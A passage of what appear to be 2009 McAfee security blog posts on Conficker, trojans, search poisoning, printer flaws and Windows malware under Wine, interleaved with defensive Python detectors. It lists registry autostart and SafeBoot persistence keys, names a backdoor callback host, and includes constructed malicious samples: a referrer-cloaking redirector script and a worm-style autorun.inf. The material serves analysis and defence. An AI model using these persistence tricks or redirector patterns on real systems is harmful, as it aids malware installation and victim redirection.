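SAMPLE_RESPONSE = (b"HTTP/1.1 200 OK\r\n"
                   b"Date: Tue, 24 Mar 2009 18:02:11 GMT\r\n"
                   b"Server: Apache\r\n"
                   b"Content-Length: 2\r\n"
                   b"\r\n"
                   b"ok")
APRIL_FOOLS = datetime(2009, 4, 1, 12, 0, 0, tzinfo=timezone.utc)


if __name__ == "__main__":
    print(rewrite_date(SAMPLE_RESPONSE, APRIL_FOOLS).decode())
```

    Because RFC 1123 dates are fixed width, swapping one for another leaves the byte length of the response unchanged, which matters when mangling live TCP segments in place (no sequence-number fix-ups) rather than terminating the connection in a proxy. The second date source, the local clock, has to be set on the infected guest separately; only the network side is handled here.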

    There were a few instances where Conficker.C did discover peers out there, and exchanged short UDP packets with them over several minutes. We were extremely curious about them.

    Vinay Mahadik reverse engineered the 95+ conversations, across some 50K+ UDP peer-discovery packets, and found patterns in both the requests and the responses. These patterns hold for both the pre-April 1 and April 1 UDP scans. Based on this, we have incorporated a new heuristic into our latest Network Security Platform signature sets, 5.1.16.15 and 4.1.46.16.

    McAfee Network Security Platform (IntruShield) customers will see the following alerts:

    • WORM: W32/Conficker.C Activity Detected
    • HTTP: Suspicious Time Check Detected

    The figure below illustrates the alert viewer drilled down by a Source IP that has generated the “WORM: W32/Conficker.C Activity Detected ” alert.

     (Both Vinay Mahadik and Ravi Balupari have contributed to this research blog)

    Conficker Activation On April 1st

    Hello, it is now April 1st for at least Asia Pacific and Europe. We’ve been blogging and posting various resources about ways to protect against the Conficker worm up to its “activation day”:

    The day has finally arrived.

    McAfee Avert Labs has been closely monitoring Conficker-related threats and, we haven’t observed any significant activities on the domains that it is polling for thus far. Even so, please remain vigilant and watch this space for any further updates to the current status.

    On measures to protect yourself and your organisation against Conficker, please visit:

    W32/Conficker: Much Ado About Nothing?

    In the run-up to April 1, the media spotlight on the latest Conficker worm variant has reached a morbid frenzy. From being touted as an “April Fool’s joke” to outrageous headlines such as “Millions of computers expected to be destroyed,” no other worm in recent history has generated this much media attention. But what have we learned from history? From the days of Michelangelo to the more recent Blaster, SoBig, Sober, and Kamasutra worms, the hype surrounding the activation or payload dates of major Internet worms has turned out to be a damp squib every time.

    What happens on April Fool’s Day is anyone’s guess. Although we still don’t know the real intent of the authors of the Conficker worm, they have consistently improved the worm by adding new functionality and anti-debugging tricks with every released variant. In order to resist the Conficker Cabal initiative, which recently blocked domain registrations associated with previous Conficker A and B variants, the worm authors upped the randomly generated domain count from 250 to 50,000. The intent behind generating and attempting to contact so many domains is to make it extremely difficult for security researchers to monitor sites that could potentially host a payload for the Conficker worm to download and execute.

    What we do know is almost all the security vendors have thoroughly analyzed Conficker–also known as Downadup and Kido worm–and have good generic detection and cleaning in place. Uploading a couple of randomly selected Conficker binaries to the VirusTotal site consistently shows an overall anti-virus detection rate of 90 percent or above. And these high detection rates are across vendors–small or big.

    To prepare for any trouble on April 1, McAfee now offers a special build of its standalone cleaning tool Stinger, which will be updated on a daily basis to include any undetected Conficker variants from the wild. This special build of Stinger can be downloaded from the Avert Tools site. We’ve also posted detailed documentation on mitigation steps that security staff within organizations can take to combat W32/Conficker. Additional McAfee product coverage information for MS08-067–the Microsoft Windows Server Service vulnerability, which is exploited by the worm–can be viewed at the McAfee Threat Center.

    Please ensure that your copy of Microsoft Windows is patched and your security software is fully up to date. That way you won’t end up an April Fool.

    Sound Fake? Finding a Malicious Driver

    You already know that malware changes registry keys to take advantage of the autorun capability when systems and applications start. The registry keys we often see for this purpose include:

    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\[Legit_program]\Debugger
    HKEY_CLASSES_ROOT\CLSID\[CLSID]\InprocServer32

    Recently, we noticed that the Lando Trojan uses a different registry key to load its malicious code into Internet Explorer. By dropping a fake sound driver (wdmaud.sys) into the %system32% folder and adding the registry value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux2 = “%system32%\wdmaud.sys”, the malware author has the file loaded as a multimedia driver into processes that initialize the Windows multimedia subsystem, among them iexplore.exe. When the user launches Internet Explorer, the attacker hijacks Google searches.

    How can you distinguish the real sound driver from the fake? The legitimate wdmaud.sys is a Microsoft component (the WINMM WDM Audio Compatibility driver) that lives in the %system32%\drivers\ folder. It is about 84KB and carries complete version information.

    The malicious wdmaud.sys, by contrast, sits directly in the %system32% folder rather than in its drivers\ subfolder. It is only about 22KB and has no version information.

    By comparing their file properties, you can easily tell the difference. But, as always, be careful when deleting the malicious wdmaud.sys or other suspicious files. You don’t want to trash the legitimate driver.

    Patch Those Internet Printers

    When I wrote a scanner plug-in this week for an old directory traversal vulnerability, CVE-2008-4419, I wondered whether there are vulnerable HP LaserJet printers online that can be controlled from the Internet. To find out, I used Google. The search listed almost 50 results, and I found that almost all of these printers were unpatched, even though HP has provided firmware updates that resolve this vulnerability. An attacker could leverage this Unicode-encoded directory traversal to read configuration files or cached documents, gaining read access from the Internet to important internal information.

    Administrators often neglect the security of printer devices. They may think there is no harm even if an attacker can control the printer remotely.

    The administration web interface of these LaserJets can be accessed without passwords. The attacker can use these LaserJets to print any documents from anywhere. Although attackers may not be able to reach the printouts, at least they can waste a lot of paper. Spammers can also post free advertising to companies if they connect to these printers. ;)

    So please harden your network gateway or firewall to restrict access to these devices. Don’t give everyone on the Internet a chance to use your printer, and patch the vulnerable LaserJets to prevent the potential information disclosure.

    To download the HP firmware updates and upgrade instructions, click here.

    McAfee Debuts ‘Combating Threats’ Series

    McAfee Avert Labs will now produce more detailed documentation on prevalent threat families. The “Combating Threats” document series is designed to arm security staff within organizations with more information concerning prevalent threat families as well as to provide additional mitigation steps that can be taken. The first two documents in this series, “W32/Virut Family” and “Finding W32/Conficker.worm,” are now available via our blog, prior to our “Combating Threats” web page going live.

    UPDATE MARCH 17th

    Apologies for the busted links yesterday. All seem to be resolving fine now.

    Malware Again Attacks Ichitaro Word Processor

    For years, the Japanese word processor Ichitaro has been attacked by malware authors exploiting flaws in the application. So it is no surprise that in the last week we discovered in the wild specially crafted Ichitaro document files exploiting a new vulnerability.

    This time, the crafted file (detected as the Exploit-TaroDrop.g Trojan) drops and runs the Generic Dropper Trojan, which in turn drops the BackDoor-DNW Trojan. The latter attempts to connect to “lightsut.com:80” and opens a backdoor that gives attackers remote access to compromised machines. McAfee proactively detects Generic Dropper, which prevents users from being infected with BackDoor-DNW even with an unpatched copy of Ichitaro.

    Detection alert of Japanese McAfee VirusScan Enterprise

    The patch for this vulnerability has already been published by JustSystem. Ichitaro users should apply the update as soon as possible.

    Breaking News: Waledac Terror Attack in a City Near You

    Users should always take care while surfing the Internet and reading mail, and today maybe more than usual: Another spam run from the Waledac botnet is on the loose, this time misusing the good reputation of the news agency Reuters. After the “President Inauguration,” “Valentine Scam,” and the “Economic Crisis,” this time the social-engineering trick is a “Terror Attack” in your city. Mails with subjects such as “Why did they explode bomb there?” or “Why did it happen in your city?” are being sent out by the botnet right now.

    Again the bad guys are using geolocation services to better target their audience. As described in my earlier blog, they are using the city name of the user visiting the fake website and inserting this name into the website itself. So the “breaking news” gets even more attention, because when an attack happens in your home town, everyone would be anxious and curious, right? The screenshot below is an example what a user from New York would see; other users would see the same message but with their local city being “attacked”:

    The website claims that a “dirty bomb” exploded in the user’s city and that at least 12 people have been killed. A video from Reuters is presented but “You need the latest Flash player to view video content. Click here to download.” It’s another example of the time-worn missing-codec trick. The needed “update” named main.exe or save.exe is in fact the real malware.

    The fast-fluxing website also includes a malicious IFRAME that refers to malicious code trying to exploit unpatched computers with an additional drive-by infection.

    The Waledac/Storm authors try to keep their botnet running and constantly craft new social-engineering tricks to fool unsuspecting users into following their lure. As always, the best advice is not to click links in spam mails. And the malicious IFRAME pointing to a drive-by infection is another good reminder that “curiosity killed the cat.”

    Democrats.org Cans the Spam

    Last week I blogged about how the community forum of Democrats.org was being abused to help manipulate Google’s search results; to lead people to malware.  It appeared that by the end of last week, Democrats.org began the cleanup process of removing all the bogus posts, which seems to have been completed as of this time.  Google’s cache shows that other popular sites were hit as well, including my.barackobama.com and Microsoft’s silverlight.net, which were cleaned up sometime before the end of last week.

    In looking a little more at the spammed phrases, it appears as though there are likely multiple groups behind these attacks, perhaps with different agendas.   Some of this is obvious from the formatting of the spam.  The terms themselves also vary, some appear in more dictionary style, while others are more focused on current events, and others still are rather uncommon.  The uncommon terms (including typos) lead me to speculate that at least some terms originated from compromised systems.  There may be a circular nature to this, where unsuspecting victims become infected with one piece of malware, only to have their search terms harvested, analyzed, and subsequently used to entice other victims, but again this is speculation at this point.

    Safe Mode: A Misnomer

    Windows offers the useful option of “Safe Mode” to recover from any damage caused by various malfunctions in the system. Booting in Safe Mode loads limited drivers and services that are required for the basic operation of the system, but avoids adding many extras that complicate the environment. In general, Safe Mode is very helpful in recovering the system from malware infections. However, malware can exploit this feature by loading in Safe Mode, thus creating great difficulties for users and administrators in recovering from these infections.

    Safe Mode not safe

    The services and drivers that load in Safe Mode are listed under the following registry key(s):

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network

    If malware gains control of the system, it can add its entry under the above key(s) to load during a Safe Mode boot. This type of malware is difficult to remove manually; you’ll need an anti-virus product to detect and clean such malware.
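    Both the Drivers32 trick from the “Sound Fake? Finding a Malicious Driver” post above and the SafeBoot trick described here show up in a plain registry export, which is handy when triaging an offline hive or an export pulled from a suspect machine. The following is an added example, not a McAfee tool: it parses “Windows Registry Editor Version 5.00” text, flags Drivers32 values that point at a file by absolute path or name something other than a .drv/.acm/.dll module (the fake wdmaud.sys was a .sys given by path), and lists SafeBoot\Minimal and SafeBoot\Network subkeys that a clean baseline export does not have. Both exports are constructed, and evilsvc is a placeholder name.

```python
"""Flag two autostart abuses from a plain registry export: a Drivers32 value
that does not name a normal multimedia module (the "Sound Fake" post) and
SafeBoot subkeys a clean baseline lacks (this post).  Added example, not a
McAfee tool; it reads text from `reg export`/regedit so it runs offline, and
both exports below are constructed."""
import re
from typing import Dict, List, Tuple

RegDump = Dict[str, Dict[str, str]]   # key path -> {value name -> data}

_KEY_RE = re.compile(r"^\[(.+)\]$")
_VAL_RE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')

DRIVERS32 = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32"
SAFEBOOT = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot"
# winmm loads Drivers32 entries as user-mode modules named without a path.
OK_MODULE_EXT = (".drv", ".acm", ".dll")


def parse_reg_export(text: str) -> RegDump:
    """Minimal parser for 'Windows Registry Editor Version 5.00' text: keys in
    brackets, "name"="string" or @="string" values.  Non-string values are
    kept in their textual form, which is enough for these checks."""
    dump: RegDump = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        km = _KEY_RE.match(line)
        if km:
            current = km.group(1)
            dump.setdefault(current, {})
            continue
        vm = _VAL_RE.match(line)
        if vm and current is not None:
            name = vm.group(1) if vm.group(1) is not None else "@"
            data = vm.group(2)
            if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
                data = data[1:-1].replace('\\\\', '\\').replace('\\"', '"')
            dump[current][name] = data
    return dump


def suspicious_drivers32(dump: RegDump) -> List[Tuple[str, str, str]]:
    """(value name, data, reason) for Drivers32 entries given by path or
    naming something other than a .drv/.acm/.dll module.  Heuristic."""
    findings = []
    for name, data in dump.get(DRIVERS32, {}).items():
        low = data.lower()
        if "\\" in low or "%" in low:
            findings.append((name, data, "module given by path instead of bare name"))
        elif not low.endswith(OK_MODULE_EXT):
            findings.append((name, data, "not a user-mode multimedia module"))
    return findings


def safeboot_additions(baseline: RegDump, suspect: RegDump) -> List[str]:
    """Subkeys under SafeBoot Minimal or Network that are present in the
    suspect export but absent from a clean baseline export of the same keys."""
    prefixes = tuple(p.lower() for p in (SAFEBOOT + "\\Minimal\\", SAFEBOOT + "\\Network\\"))
    known = {k.lower() for k in baseline}
    return sorted(k for k in suspect
                  if k.lower().startswith(prefixes) and k.lower() not in known)


# Constructed exports.  The clean one mirrors what the keys normally hold;
# the infected one adds the fake sound driver and a placeholder service.
CLEAN_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
"aux"="wdmaud.drv"
"wave"="wdmaud.drv"
"midi"="wdmaud.drv"
"msacm.imaadpcm"="imaadp32.acm"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AppMgmt]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Base]
@="Driver Group"
"""

INFECTED_EXPORT = CLEAN_EXPORT + r"""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
"aux2"="C:\\WINDOWS\\system32\\wdmaud.sys"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\evilsvc]
@="Service"
"""


if __name__ == "__main__":
    clean, bad = parse_reg_export(CLEAN_EXPORT), parse_reg_export(INFECTED_EXPORT)
    print(suspicious_drivers32(bad))
    print(safeboot_additions(clean, bad))
```

    The SafeBoot check is a diff against a known-good export rather than an allow list, because the legitimate contents of SafeBoot\Minimal vary by Windows version and installed software; take the baseline from a clean build of the same image. The Drivers32 check is a heuristic and will also flag unusual but legitimate codecs, so treat its output as a lead to verify against file size and version information, as the post above does.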

    Always practice “safe surfing,” which is the first step in keeping your computers clean, and keep your anti-virus signatures updated.

    Democrats.org Blog Spam Contributes to Google Search Poisoning

    The other day I blogged about Google Trends being abused to serve malware. The attackers were not only targeting the most popular search terms, but also manipulating Google’s page rankings to appear high up in search results. Shortly thereafter it appeared that Google took action against that attack; indeed, a Google spokesperson confirmed as much.

    Today, Brian Krebs blogged on a separate story, but mentioned that while searching for a related term (pifts.exe), Google returned a poisoned link high on the results list.  After doing a little searching I discovered that the relevant term did seem to appear on Google’s top 100 search terms for a brief period.  However, the other terms I checked on Google Trends did not yield high ranked poisoned links as before.  But, I did come across a potential source for the page rank manipulation aspects of these attacks;  www.democrats.org, which is “Paid for by the Democratic National Committee “, and linked to from www.barackobama.com.

    It turns out that this high-ranking website has a community blog feature that allows anyone to create a blog and post whatever they want.  Attackers have flooded this forum with bogus posts and thousands of links for more than a month.

    Blog spam such as this is not anything new.  However, this highlights one significant effect of such spam and underlines the cause and effect relationship of security on the web.

    Web searches are immensely useful and quite powerful.
    Web 2.0, where a community of users contributes content for the betterment of the community can be a great thing.
    But combined, a bad apple (or thousands) doesn’t just hurt the community; it can hurt a significant portion of the Web itself.

    Google Bucking the Trend?

    The other day I blogged about Google Trends being abused to serve malware.  The attackers were not only targeting the most popular search terms, but also manipulating Google’s page rankings to appear high up on search results.  It appears that Google may have squashed those attacks, at least at the moment.

    The pages that were coming up while searching Google seem to be purged from Google’s index.  The pages may still be found on other search engines, though not ranked as high.  This is also visible in stats I started gathering yesterday.

    I took the top 100 search terms for each day of this week and ran a Google search on each term. I then considered the top 10 search results for each term, looking for highly ranked poisoned links. Admittedly it would have been better to gather the search results on each day rather than running the test several days after the fact, but nonetheless the limited results do suggest that Google took some recent action.

    The following graph shows significant activity prior to mid-day yesterday.

    We can assume the attackers will be looking at new and creative ways to circumvent any countermeasures that may be in place.

    Search safe.

    Google Trends Abused to Serve Malware

    The other day a worm, often referred to as “Error Check System”, was spreading on Facebook.  In fact, if you searched for information on this threat, your search results were poisoned to lead unsuspecting victims to a site that attempts to install a rogue anti-spyware Trojan.  Some folks blogged that this search connection was “too much of a coincidence”, and that the Facebook part of the threat was a “red herring”.  I do not believe this is the case, and here’s why.

    Last week I was following up on a comment made to the McAfee Avert Labs blog.  The URL provided by the visitor (**********.******.bee.pl/waledac_botnet.html) redirected to another site that attempted to install the same trojan.  Running a search on part of that URL yielded hundreds of search results, many of which were placed high up on Google’s results.  The summary text was relevant for the search term, and it’s clear that those behind the redirects are manipulating the internet (Google): not only getting their newly created sites to appear high on the search results page, but also having them display relevant text in the page summary section, and for the hottest terms.  Here’s one example, ironically related to the recent Gmail outage.


    You’ll also notice that the page summary is identical to the top search result, taken from Google News.  Looking at more search results it is clear that the attackers are targeting popular search terms.

    Other searches show the results using all lowercase titles, the same as used by Google Trends.  In fact, checking some of the top Google Trends links we can see that the abusers are hitting it (ash wednesday 2009 was the #1 search term at the time of this writing; this image was edited to fit on the blog).

    The notion of malware distributors abusing Google Trends is not new, and received some attention in October of last year.  However, I do not recall previous attacks being as aggressive as the current ones, being distributed across numerous sites, targeting many many high-profile search terms, and having the poisoned links regularly appearing high up in the result pages.

    Once a user visits one of these poisoned links, the destination page references a script file (style.js), which is obfuscated.

    Decoding the script shows that it redirects the user based on the referring URL containing “google”, “msn”, “yahoo”, “comcast” or “aol.com”.  This is just one of the many ways the bad guys focus their attacks on potential victims, while making it a tiny bit more difficult for others to discover it.  Once you’re redirected, it’s situation normal for the attackers: various fake alert and scanning messages and windows appearing, ultimately leading to the installation of a FakeAlert trojan (such as one of the 9,500+ known binaries identified by McAfee as FakeAlert-AB).
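    One way an analyst can triage a decoded redirector script for this kind of referrer cloaking is to look for the three ingredients named above: a read of document.referrer, a list of search-engine strings, and an assignment to location. The following Python is an added example written for this post; it is not the real style.js, and the decoded snippet it scans is a constructed stand-in whose landing URL is a placeholder.

```python
import re

# Constructed, already-decoded stand-in for the kind of "style.js" the post
# describes. It is NOT the real script; the landing host is a placeholder.
SAMPLE_DECODED_JS = r"""
var r = document.referrer.toLowerCase();
var e = ["google", "msn", "yahoo", " comcast", "aol.com"];
for (var i = 0; i < e.length; i++) {
  if (r.indexOf(e[i]) != -1) {
    window.location = "http://scanner.example.invalid/landing.php";
  }
}
"""

# A JS string literal in either quote style.
QUOTED = '"[^"]*"|\'[^\']*\''
# An array literal made only of string literals, e.g. ["google", "msn"].
STRING_LIST_RE = re.compile(r"\[\s*((?:" + QUOTED + r")(?:\s*,\s*(?:" + QUOTED + r"))*)\s*\]")
REFERRER_RE = re.compile(r"document\.referrer", re.I)
# location = "..."  /  location.href = "..."  /  location.replace("...")
REDIRECT_RE = re.compile(
    r"(?:window\.|document\.|top\.|self\.)?location(?:\.href)?\s*=\s*(?P<q>[\"'])(?P<a>[^\"']+)(?P=q)"
    r"|location\.(?:replace|assign)\(\s*(?P<q2>[\"'])(?P<b>[^\"']+)(?P=q2)\s*\)",
    re.I,
)
# Substrings that identify search-engine / portal referrers (assumed list).
KNOWN_ENGINES = {"google", "msn", "yahoo", "bing", "aol", "comcast", "ask", "live.com"}


def find_referrer_cloaking(js: str) -> dict:
    """Collect evidence that a decoded script redirects only search-engine visitors."""
    uses_referrer = bool(REFERRER_RE.search(js))

    engines = []
    for m in STRING_LIST_RE.finditer(js):
        items = [s[1:-1].strip().lower() for s in re.findall(QUOTED, m.group(1))]
        engines.extend(s for s in items if any(k in s for k in KNOWN_ENGINES))

    targets = [m.group("a") or m.group("b") for m in REDIRECT_RE.finditer(js)]

    return {
        "uses_referrer": uses_referrer,
        "search_engines": engines,
        "redirect_targets": targets,
        # All three together are the cloaking pattern described in the post.
        "suspicious": uses_referrer and bool(engines) and bool(targets),
    }


if __name__ == "__main__":
    for k, v in find_referrer_cloaking(SAMPLE_DECODED_JS).items():
        print(f"{k}: {v}")
```

    Run it against the decoded script, not the obfuscated one; the regexes are deliberately loose so they tolerate different spacing and quote styles, which is why the verdict requires all three signals rather than any one of them.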

    If you made it down to the bottom of this blog, I probably don’t need to remind you to look carefully before you click, on the Web.

    New Excel Trojan Hits the Net

    – Update Feb 24, 10:15 PDT –
    Microsoft has released a security advisory for this issue (CVE-2009-0238):
    http://www.microsoft.com/technet/security/advisory/968272.mspx

    Many versions of Excel are vulnerable, including 2000, 2002, 2003, 2007, 2004/2008 for Mac, Excel Viewer/Excel Viewer 2003.

    A Trojan exploiting an unpatched Microsoft Excel vulnerability has been reported from the field. McAfee Avert Labs has confirmed that Microsoft Excel 2007 and 2003 are affected. Other versions may also be impacted.

    McAfee DAT files identify known malicious Excel spreadsheet files as Exploit-MSExcel.r Trojan, and dropped files as BackDoor-DUE Trojan in the 5534 DATs.

    As with the initial Exploit-PDF.i threat, current attacks are very targeted and limited. When successful, it installs a backdoor that attempts to connect to a remote site on port 80 and waits for commands.

    The mitigation for this infection is to block unknown TCP connections. However, one of the best protection methods is to remain vigilant against Excel files from untrusted sources or sent at an unexpected time until a security update is available.

    Running Windows Malware in Linux

    For the unaware, Wine is an application that enables users to run Windows applications on Unix-like computers. Like many users, I use Wine on my Linux machine to run a couple of Windows applications I cannot do without. I could run these applications on a virtual machine, or even dual-boot with Windows and Linux, but running them in Wine is just easier.

    Although running Windows applications in Wine has its advantages, it also comes at a price: bringing Windows malware into Linux. I’m aware that it isn’t Wine’s responsibility to distinguish between a malicious and a nonmalicious file, and that Wine shouldn’t have any problem running a malicious file; however, I had this morbid curiosity to see how well today’s malware would fare running on Wine, and so began an experiment using the following setup:

    • Ubuntu Linux 8.04 [comes with Gnome desktop environment]
    • Wine 1.0 [run as a nonroot user with default settings]

    I decided to choose samples that displayed a cocktail of malicious behavior, and so I chose the following:

    File Infectors

    W32/Philis is a file infector that apart from appending its code to other executables downloads and drops other malware.

    This malware ran without throwing any errors in Wine. It immediately dropped files in the “Windows” and “Windows\System32” folders and executed these dropped files. It then attempted to connect to a preconfigured site, and downloaded more malware successfully. It also began infecting executables in the Wine directory and created a registry run key for the malicious file.

    The screenshot below shows the clean “CProcess.ori,” the original file 35KB in size, and “CProcess.vir,” the infected file 131KB in size.

    It’s worth mentioning that the autostart registry key the file infector created will not work under Wine, so applications will not be able to autostart when the Linux machine is booted up. Also, this file infector didn’t seem to infect ELF files. But I’m guessing that a file infector that blindly appends/prepends its code to other files shouldn’t have any problem corrupting ELF files.

    Autorun Malware

    W32/Autorun.Worm.CP is an autorun worm, which drops autorun.inf in the root of removable drives.

    This malware also ran without any errors. It dropped both the malicious files and the associated autorun.inf file in the C:\ drive and attached removable devices, and created a registry run key.

    The screenshot below shows the created Autorun.inf file, along with the malicious files that were created in the root of the removable device.

    The registry run key created by the malware won’t work in Wine, however. As long as the malicious file is running, any new removable devices connected to the machine will get infected, thus making a Linux machine the origin of an infection.

    Although it is difficult for malware to autostart in Wine, it is not impossible. Malware can be written to find out if it is running in Wine. It can then either download a Linux binary onto the machine and/or simply add an autostart entry for itself in the Linux desktop environment’s common autostart locations, using the nonroot user’s credentials.
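    Because the worm above keeps seeding removable media from the Linux host, a quick way to check a mounted drive is to parse its autorun.inf and see whether the launch directives point at an executable. The Python below is an added example for this post, not McAfee code; the autorun.inf it parses is a constructed sample with placeholder file names, not the worm’s real one.

```python
# Constructed sample in the style of an autorun.inf dropped by an autorun
# worm; the file names are placeholders, not the real worm's.
SAMPLE_AUTORUN_INF = r"""
[autorun]
; comment lines are ignored by Windows
open=RECYCLER\setup.exe
icon=%SystemRoot%\system32\SHELL32.dll,4
shellexecute=RECYCLER\setup.exe
shell\open\Command=RECYCLER\setup.exe
shell=open
action=Open folder to view files
label=My Disk
"""

# Extensions Windows will execute directly from an autorun directive.
EXEC_EXT = {".exe", ".com", ".bat", ".cmd", ".pif", ".scr", ".vbs", ".js", ".hta"}
# Directives that launch a program (besides shell\<verb>\command entries).
LAUNCH_KEYS = ("open", "shellexecute")


def parse_autorun_inf(text: str) -> dict:
    """Parse INI-style autorun.inf into {section: {key: value}}, case-insensitively."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current][key.strip().lower()] = value.strip()
    return sections


def launch_targets(sections: dict) -> list:
    """Return the [autorun] directives that would launch something, with a verdict each."""
    hits = []
    for key, value in sections.get("autorun", {}).items():
        is_launch = key in LAUNCH_KEYS or (key.startswith("shell\\") and key.endswith("\\command"))
        if not is_launch:
            continue
        parts = value.split()
        first = parts[0].strip('"').lower() if parts else ""
        ext = first[first.rfind("."):] if "." in first else ""
        hits.append({"key": key, "value": value, "executable": ext in EXEC_EXT})
    return hits


def is_suspicious(text: str) -> bool:
    """True when any launch directive points at an executable file."""
    return any(h["executable"] for h in launch_targets(parse_autorun_inf(text)))


if __name__ == "__main__":
    for hit in launch_targets(parse_autorun_inf(SAMPLE_AUTORUN_INF)):
        print(hit)
    print("suspicious:", is_suspicious(SAMPLE_AUTORUN_INF))
```

    On a real drive, read the file in binary and decode leniently (worms often pad autorun.inf with junk bytes); a legitimate autorun.inf that only sets an icon or label produces no hits.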

    IRC Trojans

    IRC/Contact malware drops files and connects to a preconfigured IRC server. This IRC Trojan, when run in Wine, connected to the preconfigured IRC server. From the IRC server I was able to connect to the bot, and control it. Though the control was limited, I was still able to list the files under the Wine directory, get system information, download files to the Linux machine remotely, etc.

    The screen shot below shows my logging into the infected Linux machine and issuing commands:


    The screen shot below shows the infected machine responding to the “getinfo” command issued from the IRC channel:


    This IRC Trojan was very simple in features, but I’m guessing that with a complex one, an attacker shouldn’t have any problem scanning the subnet for an exploit and sending a payload to infect Windows machines.

    Keyloggers/Password Stealers

    Apart from this, I tried running a couple of password stealers and keyloggers, but I couldn’t find one that worked well. I’m guessing they couldn’t get a hook to the keyboard.

    Although stealing information using Windows malware in Wine is difficult, an infected Linux machine can still contribute to a DoS attack or be the origin of an infection, as suggested earlier.

    Scareware

    This class of malware displays falsely exaggerated scan reports and tricks users into buying the bogus product. They utilize extreme social-engineering tactics combined with obfuscated JavaScript that checks for exploits on the machine.

    Although I didn’t run the Scareware installer in Wine, I did browse through a site that ran a JavaScript to pop up a window informing me that my “Windows” machine was infected, and requested that I install the malicious file.

    Screen shots below:


    It is important to note that if the user had set the file association for Windows executables with Wine, then simply double-clicking the downloaded file would run the malware.

    Mitigation Techniques

    • Never run Wine applications as root.
    • Wine maps the root directory, the user’s home directory, CD ROMs and removable devices found, and these mappings are listed in “~/.wine/dosdevices/”. Consider deleting these except the link to your drive_c.
    • Do not set the file association for Windows executables with Wine. This would enable the running of Windows executables in Wine by simply double-clicking them.
    • Administrators should think twice before installing Wine on a Linux server. These machines are seldom turned off, so the problem that malware faces in Wine with respect to autostarting its code when the machine boots up, mentioned earlier, would no longer apply.
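    The first three mitigations can be audited from a script: refuse to proceed as root, list the drive mappings Wine keeps in ~/.wine/dosdevices/ and prune everything except the drive_c link, and report which desktop handler is registered for Windows executables. The Python below is an added example written for this post, not part of Wine or of McAfee’s tooling; it assumes the standard Wine prefix layout (c: -> ../drive_c, z: -> /, d:: -> a CD-ROM device) and the freedesktop xdg-mime tool, and it builds a throwaway copy of that layout so it can be run without touching a real prefix.

```python
import os
import shutil
import subprocess
import tempfile
from pathlib import Path

# Standard Wine prefix layout (assumption documented in the lead-in):
#   c:  -> ../drive_c   the Wine "C:" drive; keep this one
#   z:  -> /            the whole Linux root; the post advises removing it
#   d:: -> /dev/sr0     raw device link for a CD-ROM
DEFAULT_DOSDEVICES = Path.home() / ".wine" / "dosdevices"


def running_as_root() -> bool:
    """Mitigation 1: Wine (and this audit) should never run as root."""
    return hasattr(os, "geteuid") and os.geteuid() == 0


def list_mappings(dosdevices: Path) -> dict:
    """Return {name: symlink target} for every mapping in dosdevices/."""
    out = {}
    if dosdevices.is_dir():
        for entry in sorted(dosdevices.iterdir()):
            if entry.is_symlink():
                out[entry.name] = os.readlink(entry)
    return out


def prune_mappings(dosdevices: Path, keep=("c:",), dry_run=True) -> list:
    """Mitigation 2: remove every drive/device link except those in `keep`.
    Returns the names removed (or that would be removed when dry_run=True)."""
    removed = []
    for name in list_mappings(dosdevices):
        if name.lower() in keep:
            continue
        if not dry_run:
            (dosdevices / name).unlink()
        removed.append(name)
    return removed


def exe_handler():
    """Mitigation 3: desktop default handler for .exe files, via xdg-mime.
    Returns None when xdg-mime is absent or the query fails."""
    if shutil.which("xdg-mime") is None:
        return None
    try:
        res = subprocess.run(
            ["xdg-mime", "query", "default", "application/x-ms-dos-executable"],
            capture_output=True, text=True, timeout=5)
    except (OSError, subprocess.SubprocessError):
        return None
    return res.stdout.strip() or None


def make_demo_prefix() -> Path:
    """Constructed stand-in for ~/.wine/dosdevices so the audit runs offline."""
    root = Path(tempfile.mkdtemp(prefix="wine-audit-"))
    dd = root / "dosdevices"
    dd.mkdir()
    (root / "drive_c").mkdir()
    os.symlink("../drive_c", dd / "c:")
    os.symlink("/", dd / "z:")
    os.symlink("/media", dd / "e:")
    os.symlink("/dev/sr0", dd / "d::")
    return dd


if __name__ == "__main__":
    if running_as_root():
        raise SystemExit("refusing to run as root")
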